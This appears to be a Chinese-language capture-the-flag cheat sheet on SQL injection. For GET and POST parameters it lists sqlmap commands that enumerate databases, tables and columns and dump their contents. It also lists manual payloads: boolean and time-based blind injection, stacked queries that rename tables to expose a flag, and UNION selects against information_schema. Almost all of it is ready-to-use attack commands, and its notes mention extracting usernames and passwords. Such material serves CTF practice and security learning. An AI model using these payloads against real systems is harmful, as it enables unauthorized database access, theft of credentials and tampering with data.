get
sqlmap -u url/?inject=1
---
Parameter: inject (GET) # get
Type: boolean-based blind #布尔盲注
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: inject=1' AND 2572=2572 AND 'WxsW'='WxsW
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: inject=1' AND SLEEP(5) AND 'EApM'='EApM
---
1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#
这段代码的意思是将words表名改为words1,1919810931114514表名改为words,将现在的words表中的flag列名改为id 然后用1' or 1=1 #得到flag值
get |
sqlmap |
url |
先爆出数据库名字 |
sqlmap -u url/?inject=1 --current-db |
url?inject=1';show databases;# |
再爆出表名 |
sqlmap -u url/?inject=1 -D 数据库名字 --tables |
1';show tables;# |
再爆出重点内容比如用户名字密码 |
sqlmap -u url/?inject=1 -D 数据库名字 -T 表名字 --columns |
1';show columns from 库名;# |
得到密码 |
sqlmap -u url/?inject=1 -D 数据库名字 -T 表名 -C "字段" --dump |
|
post
查询 |
sqlmap |
url |
1.获取注入点 |
sqlmap -u url --data "search=df" |
' union select 1,2,3 # |
2.获取数据库信息 |
sqlmap -u url --data "search=df" -dbs |
' union select 1,2,3 # |
3.获取库内表信息 |
sqlmap -u url --data "search=df" -D 库名 --tables |
' and 0 union select 1,table_schema,table_name from information_schema.columns # |
4.获取表内字段信息 |
sqlmap -u url --data "search=df" -D 库名 -T 表名 --columns |
' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='news'# |
5.获取字段内容,得到flag |
sqlmap -u url --data "search=df" -D 库名 -T 表名 -C "字段" --dump |
' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'# |